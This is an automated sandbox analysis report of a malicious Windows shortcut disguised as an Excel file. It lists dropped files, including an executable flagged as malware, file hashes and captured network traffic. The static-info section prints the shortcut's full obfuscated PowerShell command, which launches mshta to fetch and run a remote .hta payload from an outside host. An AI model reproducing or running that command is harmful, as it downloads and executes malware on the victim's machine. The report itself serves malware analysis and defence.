                                                                                                                          Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64
                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                          Malicious:false
                                                                                                                          Preview:@...e...........................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3h2akx4p.gbt.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bx55tq2v.0tl.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqgntrab.1pq.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pzb3csfr.kno.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt4fvewj.ald.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwcvnjfy.hms.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9695268fa6a0c8b2.customDestinations-ms (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5432
                                                                                                                          Entropy (8bit):3.5230635675057824
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:0rRK4kngzdCZlXuCrdZSQJIQJl2/bW/gpCl6aSogZo/JPJaW/bW/gpClJaSogZog:0FK4kfuCKRl/q/gpCuHa/q/gpCnH1
                                                                                                                          MD5:F0AF6AC48366F8841F3F87FC0169B09F
                                                                                                                          SHA1:1743C152D36A35FAD3F38A5F3435DDE13425BB05
                                                                                                                          SHA-256:84F2B4171FE48BB6EF9D9D36CF2A392EF57AC100C111C608883B3F4D4A9789BF
                                                                                                                          SHA-512:7A64A90931B9220E4C3F54EE701A629CA4E66C74DD56D801416EEDB1CF235CF9FA7228F4EAA7D4569C09DF311AADCAC5F5BAC58E9FAAF2676F4C2AF88D3CEA51
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.`.. .....e2a......1....&.+1....P............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_......4a......1......z.2.P....X.% .FT40FE~1.LNK..^......EW.>.X.%...........................j..F.T... .4.0.F.E. .C.N.Y. ...x.l.s.x...l.n.k.......`...............-......._...........6.0......C:\Users\user\Desktop\FT. 40FE CNY .xlsx.lnk..A.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.X.L.I.C.O.N.S...E.X.E.........%ProgramFiles(x86)%\Microsoft Office\root\Office16\XLICONS.EXE......................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.X.L.I.C.O.N.S...E.X.E.................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A20HZKL49GMHZSOAZMF6.temp

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5432
                                                                                                                          Entropy (8bit):3.5230635675057824
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:0rRK4kngzdCZlXuCrdZSQJIQJl2/bW/gpCl6aSogZo/JPJaW/bW/gpClJaSogZog:0FK4kfuCKRl/q/gpCuHa/q/gpCnH1
                                                                                                                          MD5:F0AF6AC48366F8841F3F87FC0169B09F
                                                                                                                          SHA1:1743C152D36A35FAD3F38A5F3435DDE13425BB05
                                                                                                                          SHA-256:84F2B4171FE48BB6EF9D9D36CF2A392EF57AC100C111C608883B3F4D4A9789BF
                                                                                                                          SHA-512:7A64A90931B9220E4C3F54EE701A629CA4E66C74DD56D801416EEDB1CF235CF9FA7228F4EAA7D4569C09DF311AADCAC5F5BAC58E9FAAF2676F4C2AF88D3CEA51
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.`.. .....e2a......1....&.+1....P............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_......4a......1......z.2.P....X.% .FT40FE~1.LNK..^......EW.>.X.%...........................j..F.T... .4.0.F.E. .C.N.Y. ...x.l.s.x...l.n.k.......`...............-......._...........6.0......C:\Users\user\Desktop\FT. 40FE CNY .xlsx.lnk..A.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.X.L.I.C.O.N.S...E.X.E.........%ProgramFiles(x86)%\Microsoft Office\root\Office16\XLICONS.EXE......................................................................................................................................................................................................%.P.r.o.g.r.a.m.F.i.l.e.s.(.x.8.6.).%.\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.r.o.o.t.\.O.f.f.i.c.e.1.6.\.X.L.I.C.O.N.S...E.X.E.................................................................

                                                                                                                          C:\Users\user\AppData\Roaming\uc.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1646592
                                                                                                                          Entropy (8bit):7.466963242088156
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:NGLyrlj2BH1btTfnxx+KKozJQd/HJNRO/BwTQ+l04pEnlk8U2flxAu:NGup2B+K1mzywTQh4psG2Z
                                                                                                                          MD5:E6AC6CA27AA2D60DC59A21AF1FFDB086
                                                                                                                          SHA1:9F847E34521E8917C8B22ECA53B71306BC19AF18
                                                                                                                          SHA-256:A5B3CE892D48757DF98FEA906DFF92E0210DCBD8D1832E43DFBD2A5ECE61FBA1
                                                                                                                          SHA-512:9F4C1E3CB03CD1333A7F2E01F7A3D61803844FC4C1531DD432CC7B7DEDC5625D1253715200CB7E0F6B9C7F906A6DCBB488196153E1E2DC935B27B66D74431EE4
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                          • Antivirus: Virustotal, Detection: 38%, Browse
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................p..........D.............@..............................................@........................... ..X$...........................p...`...........................`.......................&...............................text....g.......h.................. ..`.itext...............l.............. ..`.data...LK.......L...t..............@....bss....l6...............................idata..X$... ...&..................@....tls....4....P...........................rdata.......`......................@..@.reloc...`...p...b..................@..B.rsrc................J..............@..@..................... ..............@..@................................................................................................

                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55
                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                                                                                                                          Entropy (8bit):2.788293913847845
                                                                                                                          TrID:
                                                                                                                          • Windows Shortcut (20020/1) 100.00%
                                                                                                                          File name:FT. 40FE CNY .xlsx.lnk
                                                                                                                          File size:2'128 bytes
                                                                                                                          MD5:82fde340f187a517e0feced1d4972363
                                                                                                                          SHA1:07740ba4e30a1dbc830451a0d05130ba1af28be9
                                                                                                                          SHA256:e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3
                                                                                                                          SHA512:db1630813f3a6e19b9c1bfb6dbaecd3829592230635721df5e2121217bbe2ea2a7594eae7061d5d2ce2baf4bfad5687ce22fa58dba94e8e30b0d7630e872f79c
                                                                                                                          SSDEEP:24:8A/BHYVKVWXlMT+/CWlrDA4mzScdCZTCJCZkrab0JG:8E5aeCfA4mldCZTCJCZ6aQ
                                                                                                                          TLSH:73419B106BF20714F7F79E7A2CB5B71199377805DE12CF9D005141482475E61E879F1B
                                                                                                                          File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                                                                          File Icon

                                                                                                                          Icon Hash:74f4e6c4c4c9c1cd

                                                                                                                          Static Windows Shortcut Info

                                                                                                                          General

                                                                                                                          Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Command Line Argument:.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
                                                                                                                          Icon location:C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE

                                                                                                                          Network Behavior

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Apr 24, 2024 06:45:17.763901949 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:17.763952971 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:17.764127970 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:17.772062063 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:17.772079945 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:18.424915075 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:18.425108910 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:18.487488031 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:18.487508059 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:18.488701105 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:18.488782883 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:18.490394115 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:18.532140017 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.390361071 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.390391111 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.390409946 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.390456915 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.390470982 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.390515089 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.390532970 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.390753031 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.390774012 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.390863895 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.390863895 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.390872002 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.391083002 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.708473921 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.708492041 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.708514929 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.708559036 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.708570004 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.708586931 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.708678007 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.709518909 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.709538937 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.709594965 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.709600925 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.709614038 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.709657907 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.710024118 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.710062981 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.710102081 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.710102081 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.710108995 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.710123062 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:19.710165024 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.710165024 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.710484028 CEST49705443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:19.710496902 CEST4434970589.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:24.860240936 CEST49710443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:24.860287905 CEST4434971089.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:24.860363960 CEST49710443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:24.892648935 CEST49710443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:24.892678976 CEST4434971089.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:25.525621891 CEST4434971089.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:25.525702000 CEST49710443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:25.527043104 CEST49710443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:25.527065039 CEST4434971089.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:25.527398109 CEST4434971089.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:25.536581039 CEST49710443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:25.584125996 CEST4434971089.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:26.153276920 CEST4434971089.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:26.153604031 CEST4434971089.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:26.153654099 CEST49710443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:26.205976963 CEST49710443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:26.208357096 CEST49712443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:26.208401918 CEST4434971289.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:26.208473921 CEST49712443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:26.208726883 CEST49712443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:26.208765030 CEST4434971289.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:26.232180119 CEST49712443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:26.276161909 CEST4434971289.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:26.412190914 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:26.412241936 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:26.412312984 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:26.412658930 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:26.412678003 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:26.852868080 CEST4434971289.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:26.852945089 CEST49712443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:26.852999926 CEST49712443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:27.058099985 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:27.058216095 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:27.059577942 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:27.059595108 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:27.059973001 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:27.060940981 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:27.108129978 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.028038025 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.028151989 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.028208971 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.028229952 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.028289080 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.028352022 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.028352022 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.028475046 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.028525114 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.028580904 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.028592110 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.028620005 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.071584940 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.346420050 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.346458912 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.346512079 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.346585035 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.346618891 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.346647024 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.346674919 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.347184896 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.347248077 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.347275972 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.347290039 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.347330093 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.347346067 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.374923944 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.374941111 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.375066042 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.375108004 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.375164986 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.664417982 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.664433002 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.664484978 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.664577007 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.664592981 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.664619923 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.664644003 CEST49713443192.168.2.789.46.106.29
                                                                                                                          Apr 24, 2024 06:45:28.665440083 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.665457010 CEST4434971389.46.106.29192.168.2.7
                                                                                                                          Apr 24, 2024 06:45:28.665514946 CEST49713443192.168.2.789.46.106.29
